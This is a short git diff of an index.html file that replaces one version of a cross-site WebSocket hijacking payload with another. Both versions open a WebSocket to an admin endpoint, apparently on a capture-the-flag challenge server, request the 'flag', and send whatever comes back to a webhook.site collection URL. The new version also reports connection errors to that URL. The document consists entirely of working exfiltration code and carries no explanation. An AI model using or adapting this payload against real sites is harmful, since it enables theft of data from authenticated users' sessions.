--- a/index.html
+++ b/index.html
@@ -1,31 +1,27 @@
-<script>
-  (function () {
-    const WS_URL = 'ws://65.109.185.79:1202//admin/ws';
-    const WEBHOOK_URL = 'https://webhook.site/6915a94b-5fcd-4506-a1ca-6ea389cd1576';
+<!DOCTYPE html>
+<html>
+<head>
+    <script>
+        const webhookURL = "https://webhook.site/6915a94b-5fcd-4506-a1ca-6ea389cd1576";
+        const wsURL = "ws://ce441-web.spchallenge.ir:8080/admin/ws";
+        const ws = new WebSocket(wsURL);
 
-    function sendFlagRequest(flag) {
-      const url = `${WEBHOOK_URL}?flag=${encodeURIComponent(flag)}`;
-      fetch(url).catch(console.error);
-    }
-
-    function setupWebSocket() {
-      const socket = new WebSocket(WS_URL);
-
-      socket.addEventListener('open', () => {
-        socket.send('flag');
-      });
-
-      socket.addEventListener('message', (event) => {
-        if (event && event.data) {
-          sendFlagRequest(event.data);
-        }
-      });
-
-      socket.addEventListener('error', (err) => {
-        console.error('WebSocket error:', err);
-      });
-    }
-
-    setupWebSocket();
-  })();
-</script>
+        ws.onopen = () => ws.send("flag");
+        ws.onmessage = (event) => {
+            fetch(webhookURL, {
+                method: "POST",
+                headers: { "Content-Type": "application/json" },
+                body: JSON.stringify({ message: event.data })
+            });
+        };
+        ws.onerror = (error) => {
+            fetch(webhookURL, {
+                method: "POST",
+                headers: { "Content-Type": "application/json" },
+                body: JSON.stringify({ error: `Connection failed to ${wsURL}`, details: error.message || "No additional details" })
+            });
+        };
+    </script>
+</head>
+<body></body>
+</html>
